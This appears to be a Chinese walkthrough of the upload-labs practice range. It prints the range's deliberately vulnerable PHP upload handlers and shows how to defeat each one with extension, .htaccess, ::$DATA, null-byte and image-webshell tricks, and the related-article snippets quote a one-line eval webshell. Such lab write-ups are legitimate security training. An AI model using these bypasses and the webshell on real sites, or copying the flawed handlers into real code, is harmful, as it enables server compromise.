Upload-labs

靶场搭建

1、拉取upload-labs镜像：

docker pull c0ny1/upload-labs

2、创建docker容器：

docker run -d -p 81:80 c0ny1/upload-labs

-p：意为端口映射，格式为宿主机端口:容器端口。
由于我的Linux的80端口已占用，所以服务映射到闲置的81端口。
3、查看容器的启动情况：
浏览器访问IP:814、upload文件夹创建
没有文件夹会出现报错，即使上传合法的文件也是报错。
a、进入upload-labs容器：

docker exec -it [CONTAINER ID] /bin/bash

#查看CONTAINER ID命令docker ps

b、创建upload文件夹：mkdir upload
c、给upload赋权限：chmod 777 upload
靶场搭建完成

Upload-labs

01-js检查

上传js.png抓包修改为js.php
上传成功右键打开图片链接

2-只验证Content-type

上传222.php,修改content-type为图片类型：image/jpeg、image/png、image/gif

3-黑名单绕过

上传设置了黑名单，可以通过上传其他可解析文件，.phtml .phps .php5 .pht
前提是apache的httpd.conf中有配置代码

 $deny_ext = array('.asp','.aspx','.php','.jsp');

抓包修改后缀为php5

4-.htaccess绕过

黑名单过滤了尽可能可以解析的文件后缀，除了.htaccess

$file_ext = strtolower($file_ext); //转换为小写

因此先上传一个.htaccess文件，内容如下：

SetHandler application/x-httpd-php

把文件都会当成php来解析
接下来直接上传文件内容为一句话木马的正确类型文件，比如222.png

5-大小写绕过

同样过滤一堆黑名单

 $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

与四不同的是没有将其后缀转换为小写
因此可以使用大小绕过
上传555.PHp
访问555.PHp

6-空格绕过

代码对后缀进行了大小写处理
文件名最后增加空格，写成666.phpx(x表示空格)，上传后保存在系统上的文件名最后的一个空格会被去掉，实际上保存的文件名就是666.php
上传666.php抓包修改后缀为666.phpx(x表示空格),

由于docker环境问题，又将靶场搭建在phpstudy上

访问木马文件

7-点绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");$file_name = trim($_FILES['upload_file']['name']);$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件类型不允许上传！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

代码没有对后缀名末尾的点进行处理，自此会自动去掉后缀名中最后的”.”，可在后缀名中加”.”绕过：
上传222.png抓包修改为222.php.
执行成功

8-::$DATA绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件类型不允许上传！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

没有对后缀名中的’::$DATA’进行过滤。在php+windows的情况下：如果文件名+"::$DATA“会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持”::$DATA"之前的文件名。利用windows特性，可在后缀名中加” ::$DATA”绕过，文件名改成222.php::$DATA，上传成功后保存的文件名其实是222.php：

上传成功，执行
访问文件/upload/202204012129209841.php，去掉::DATA

9-点+空格+点绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");$file_name = trim($_FILES['upload_file']['name']);$file_name = deldot($file_name);//删除文件名末尾的点$file_ext = strrchr($file_name, '.');$file_ext = strtolower($file_ext); //转换为小写$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext = trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = '此文件类型不允许上传！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

代码先是去除文件名前后的空格，再去除文件名最后所有的.，再通过strrchar函数来寻找.来确认文件名的后缀，但是最后保存文件的时候没有重命名而使用的原始的文件名，导致可以利用1.php. .(点+空格+点)来绕过
A:如果上传符合类型的文件抓包修改为.php. .

B:直接上传php文件抓包修改为.php. .

效果都是一样的，直接访问木马文件即可

10-双写文件名绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");$file_name = trim($_FILES['upload_file']['name']);$file_name = str_ireplace($deny_ext,"", $file_name);$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.$file_name;        if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错！';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';}
}

黑名单过滤，将黑名单里的后缀名替换为空且只替换一次，
绕过原理：
上传文件的后缀名凡是符合黑名单中任意一个后缀都会被替换为空，那么我们可以利用双写后缀的方式进行绕过。所以pphpph中间的php就被抹去了，剩下php达到木马文件后缀的要求。
会有两个文件生成
访问木马文件

11-00截断(get)

源码

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = '上传出错！';}} else{$msg = "只允许上传.jpg|.png|.gif类型文件！";}
}

白名单判断，但$img_path是直接拼接，因此可以利用%00截断绕过。
%00和0x00：
0x00是十六进制的0
%00是url加密，是url的终止符
当程序在输出含有chr(0)变量时，chr(0)后面的数据会被停止，换句话说，就是误把它当成结束符，后面的数据直接忽略，这就导致漏洞产生的原因。
截断条件：php版本小于5.3.4，php的magic_quotes_gpc为OFF状态
执行

12-00截断(post)

源码

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传失败";}} else {$msg = "只允许上传.jpg|.png|.gif类型文件！";}
}

与上一题不同的就是post方式传递，还是利用00截断，因为POST不会像GET对%00进行自动解码，所以需要在二进制中进行修改。

13-图片马绕过

源码

function getReailFileType($filename){$file = fopen($filename, "rb");$bin = fread($file, 2); //只读2字节fclose($file);$strInfo = @unpack("C2chars", $bin);    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    $fileType = '';    switch($typeCode){      case 255216:            $fileType = 'jpg';break;case 13780:            $fileType = 'png';break;        case 7173:            $fileType = 'gif';break;default:            $fileType = 'unknown';}    return $fileType;
}$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$temp_file = $_FILES['upload_file']['tmp_name'];$file_type = getReailFileType($temp_file);if($file_type == 'unknown'){$msg = "文件未知，上传失败！";}else{$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传出错！";}}
}

通过读文件的前2个字节判断文件类型，也就是绕过文件头检查，添加GIF图片的文件头GIF89a，绕过GIF图片检查。也可制作图片马：

copy 212.jpg /b + 222.php /a 444.jpg

直接上传
但是不能把图片当做PHP解析，因此还需要利用文件包含漏洞
访问用于测试图片

Upload-labs相关推荐

Upload labs
Pass -01(js检查) 题目基于前端js过滤,只能上传图片格式的文件,所以我们用一句话木马,改后缀上传后,用burp抓包,修改文件后缀为php,然后用蚁剑连接, 注意: 文件没有上传在具体题目中 ...
（白帽子学习笔记）前渗透——文件上传upload labs
读者需知 1.本文仅供学习使用,由于传播和利用此文所造成的损失均由使用者本人负责,文章作者不为此承担责任 2.本文参考了一些文章,如有侵权请联系本人删除第一关--前端验证 1.将浏览器中的JS代码禁 ...
upload -labs通关解析及上传类型总结和思考
Pass-01(客户端JS绕过) 客户端JS判断方法:上传一个php文件,用bp抓包,如果没抓到包就弹框说不能上传,就说明是客户端JS检测客户端JS绕过方法: 方法一: 上传一个图片马格式为jpg, ...
Upload LABS Pass-11
第十一关在服务端使用了白名单 , 但文件保存路径外漏 , 可以使用00截断准备一个 11.php 文件 , 内容为一句话木马 <?php eval($_POST[-7]);?> 上传 1 ...
Upload LABS Pass-10
第十关在后端使用了黑名单 , 将匹配到的后缀名替换为空,使文件不能使用 , 但其只过滤了一遍 , 我们可以使用双写后缀名的方式绕过黑名单准备一个 10.pphphp 文件 , 内容为一句话木马 &l ...
Upload LABS Pass-9
第九关在后端使用了黑名单,并过滤了大小写,空格,点以及数据流 , 但未对文件重命名并且只过滤了一遍点和空格 , 我们在文件后缀名添加点空格点 , 来绕过黑名单准备一个 9.php 文件 , 内容为 ...
Upload LABS Pass-8
第八关在后端使用了黑名单 , 并过滤了大小写,点以及空格 , 但并未过滤数据流 , 我们使用代理拦截请求,在文件后缀名中添加数据流,绕过黑名单准备一个 8.php 文件 , 内容为一句话木马 < ...
Upload LABS Pass-7
第七关在后端使用了黑名单 , 并过滤了大小写,空格 , 但未过滤点 , 我们使用代理拦截请求,将后缀名添加点. , 来绕过黑名单准备一个 7.php 文件 , 内容为一句话木马 <?php e ...
Upload LABS Pass-6
第六关在后端使用了黑名单 , 并过滤了大小写和点 , 但未过滤空格 , 我们使用代理抓包在后缀名中添加空格,即可绕过黑名单准备一个 6.php 文件 , 内容为一句话木马 <?php eval ...
Upload LABS Pass-5
第五关在后端使用了黑名单 , 并过滤了空格,点 , 但未过滤大小写 , 我们修改文件后缀大小写来绕过黑名单准备一个 5.PHP 文件 , 内容为一句话木马 <?php eval($_POST[ ...

Upload-labs

Upload-labs

靶场搭建

Upload-labs

01-js检查

2-只验证Content-type

3-黑名单绕过

4-.htaccess绕过

5-大小写绕过

6-空格绕过

由于docker环境问题，又将靶场搭建在phpstudy上

7-点绕过

源码

8-::$DATA绕过

源码

9-点+空格+点绕过

源码

10-双写文件名绕过

源码

11-00截断(get)

源码

12-00截断(post)

源码

13-图片马绕过

源码

Upload-labs相关推荐

最新文章

热门文章